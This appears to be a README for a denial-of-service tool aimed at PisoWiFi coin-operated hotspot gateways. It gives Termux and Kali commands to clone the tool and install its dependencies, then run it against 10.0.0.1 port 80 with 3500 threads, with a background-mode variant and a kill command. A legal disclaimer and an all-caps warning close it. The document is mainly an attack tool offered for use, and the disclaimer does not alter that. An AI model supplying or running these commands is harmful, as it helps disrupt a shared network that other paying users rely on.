Expand
pkg update && pkg upgrade -y
pkg install git python -y
git clone https://github.com/xiv3r/pisowifi-ddos.git
cd pisowifi-ddos
chmod 755 ddos.py
python ddos.py
Termux
pkg update && pkg upgrade -y && pkg install git python -y && git clone https://github.com/xiv3r/pisowifi-ddos.git && chmod 755 pisowifi-ddos/*.py && cd pisowifi-ddos && ls
Kali
sudo update && sudo apt upgrade -y && sudo apt install git python3 -y && git clone https://github.com/xiv3r/pisowifi-ddos.git && chmod 755 pisowifi-ddos/ddos.py && cd pisowifi-ddos && ls
cd pisowifi-ddos
python ddos.py -s 10.0.0.1 -p 80 -t 3500
Background mode
python ddos.py -s 10.0.0.1 -p 80 -t 3500 > /dev/null 2>&1 &
kill the process
pkill -f python
"This tool is intended solely for ethical cybersecurity purposes, such as penetration testing, vulnerability assessments, and authorized research. Unauthorized use to disrupt networks, services, or systems is illegal and violates cybersecurity laws. Misuse may result in severe legal penalties, including fines and imprisonment. Always obtain explicit permission before testing any system. By using this tool, you agree to comply with all applicable laws and assume full responsibility for your actions.
BSD CLAUSE IS IN THE CODE DIRECTLY
INCASE YOU "DIDNT KNOW" IT WILL PROTECT ME
FROM YOUR STUPID MISTAKES
PLEASE DO NOT USE THIS SINCE ITS UPGRADED AND
MAY CAUSE DAMAGE TO YOU AND THE PISO WIFI.

